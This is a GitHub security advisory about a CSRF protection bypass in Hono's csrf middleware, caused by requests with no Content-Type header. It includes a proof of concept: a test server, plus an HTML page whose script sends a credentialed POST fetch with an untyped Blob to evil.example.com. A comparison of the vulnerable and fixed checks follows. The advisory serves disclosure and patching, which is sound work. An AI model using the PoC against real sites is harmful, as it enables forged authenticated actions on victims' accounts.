GHSA-2234-fmw7-43wr

Published: 15 Oct 2024
Source: github
GitHub: reviewed
CVSS3: 5.9

Description

Hono allows bypass of CSRF Middleware by a request without Content-Type header.

Summary

Bypass CSRF Middleware by a request without Content-Type header.

Details

Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

PoC

// server.js
import { Hono } from 'hono'
import { csrf } from 'hono/csrf'

const app = new Hono()
app.use(csrf())

app.get('/', (c) => {
  return c.html('Hello Hono!')
})

// Reached only if the csrf middleware lets the POST through
app.post('/', async (c) => {
  console.log("executed")
  return c.text(await c.req.text())
})

Deno.serve(app.fetch)

<!-- PoC.html -->
<script>
  async function myclick() {
    await fetch("http://evil.example.com", {
      method: "POST",
      credentials: "include",
      // A Blob with no type: fetch sends the request without a Content-Type header
      body: new Blob([`test`], {}),
    });
  }
</script>
<input type="button" onclick="myclick()" value="run" />

Similarly, the fetch API does not add a Content-Type header to requests that have no body.

await fetch("http://localhost:8000", { method: "POST", credentials: "include" });
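As an added illustration (not Hono's own source), a minimal model of the middleware's decision: the pre-4.6.5 handling of a missing Content-Type beside a hardened variant that treats the absent header like text/plain. The request shape, lower-cased header names and the single allowed origin are assumptions of this example.

```javascript
// Added example (not Hono's own source): a minimal model of the middleware's
// decision, with the pre-4.6.5 handling of a missing Content-Type beside a
// hardened variant. Request shape and header names are assumptions.
const SAFE_METHOD_RE = /^(GET|HEAD)$/;
// Content types a cross-site <form> or a no-preflight fetch() can carry.
const FORM_CONTENT_TYPE_RE =
  /^(application\/x-www-form-urlencoded|multipart\/form-data|text\/plain)\b/i;

// Origin check shared by both variants: a missing Origin is never trusted.
function originAllowed(origin, allowedOrigin) {
  return origin !== undefined && origin === allowedOrigin;
}

// Pre-fix behaviour: the Origin check only runs for form content types, so a
// request with no Content-Type header falls through as "not a form".
function blocksCsrfVulnerable(req, allowedOrigin) {
  if (SAFE_METHOD_RE.test(req.method)) return false;
  const contentType = req.headers['content-type'] || '';
  if (!FORM_CONTENT_TYPE_RE.test(contentType)) return false;
  return !originAllowed(req.headers['origin'], allowedOrigin);
}

// Hardened behaviour: an absent Content-Type is treated like text/plain,
// because a browser can send such a request cross-site without a preflight.
function blocksCsrfHardened(req, allowedOrigin) {
  if (SAFE_METHOD_RE.test(req.method)) return false;
  const contentType = req.headers['content-type'] || 'text/plain';
  if (!FORM_CONTENT_TYPE_RE.test(contentType)) return false;
  return !originAllowed(req.headers['origin'], allowedOrigin);
}

// Constructed sample requests (headers lower-cased as a server would see them).
const SITE = 'http://localhost:8000';
const OTHER = 'https://other.example';
const samples = {
  noContentTypeCrossSite: { method: 'POST', headers: { origin: OTHER } },
  noContentTypeSameSite: { method: 'POST', headers: { origin: SITE } },
  jsonCrossSite: { method: 'POST', headers: { 'content-type': 'application/json', origin: OTHER } },
  formCrossSite: { method: 'POST', headers: { 'content-type': 'text/plain', origin: OTHER } },
  safeGet: { method: 'GET', headers: {} },
};

for (const [name, req] of Object.entries(samples)) {
  console.log(`${name}: pre-fix blocks=${blocksCsrfVulnerable(req, SITE)}, hardened blocks=${blocksCsrfHardened(req, SITE)}`);
}
```

Only the first sample differs between the two variants: the pre-fix logic lets the header-less cross-site POST through, the hardened logic rejects it, while JSON cross-site requests stay out of scope in both because the browser's preflight already covers them.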

Impact

Bypass of CSRF protection implemented with the Hono csrf middleware.

Packages

Name: hono (npm)
Affected versions: < 4.6.5
Fixed version: 4.6.5

EPSS: 0.00011 (percentile 1%, Low)

CVSS3: 5.9 Medium

Weaknesses: CWE-352

Related vulnerabilities

CVSS3: 5.9
nvd
8 months ago

Hono, a web framework, prior to version 4.6.5 is vulnerable to bypass of cross-site request forgery (CSRF) middleware by a request without Content-Type header. Although the CSRF middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe. This can allow an attacker to bypass CSRF protection implemented with Hono CSRF middleware. Version 4.6.5 fixes this issue.
